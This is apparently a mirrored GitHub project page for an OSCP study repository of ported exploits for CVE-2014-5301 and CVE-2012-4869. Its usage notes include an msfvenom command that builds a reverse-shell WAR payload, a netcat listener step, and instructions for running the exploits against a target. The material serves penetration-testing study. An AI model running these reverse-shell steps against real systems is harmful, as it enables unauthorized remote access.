项目作者: AndyCyberSec

项目描述 :
OSCP custom scripts
高级语言: Python
项目地址: git://github.com/AndyCyberSec/OSCP.git
创建时间: 2018-11-29T00:24:09Z
项目社区:https://github.com/AndyCyberSec/OSCP

开源协议:

下载


OSCP

This is a repository which contains custom/ported POC exploits. They have been made for study and learning purposes.
Currently under development.

35845.py

CVE: 2014-5301

OSVDB: 116733

URL: http://seclists.org/fulldisclosure/2015/Jan/5

Original metasploit module: https://www.exploit-db.com/exploits/35845

Usage

  1. 35845.py file.war host port
  1. First create reverse shell payload

    1. msfvenom -p java/shell_reverse_tcp LHOST=<ip address> LPORT=4444 -f war > shell.war
  2. Start netcat listener

  3. Run the script

    1. 35845.py shell.war 192.168.1.1 8080

    Note: The exploit may require multiple run to get it working. Don’t give up!

18650.py

CVE: 2012-4869

URL: http://seclists.org/fulldisclosure/2012/Mar/234

Original code: https://www.exploit-db.com/exploits/18650

Usage

Edit the file and change rhost, lhost, lport

  1. Start netcat listener on the port you configured

  2. Run the script

    1. python 18650.py